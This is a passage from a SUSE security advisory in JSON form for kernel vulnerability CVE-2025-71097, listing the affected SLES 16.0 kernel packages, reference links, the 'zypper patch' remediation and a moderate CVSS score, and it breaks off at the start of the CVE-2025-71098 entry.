"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71097",
"url": "https://www.suse.com/security/cve/CVE-2025-71097"
},
{
"category": "external",
"summary": "SUSE Bug 1256607 for CVE-2025-71097",
"url": "https://bugzilla.suse.com/1256607"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.7,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-71097"
},
{
"cve": "CVE-2025-71098",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71098"
}
],
"notes": [
{
"category": "general",
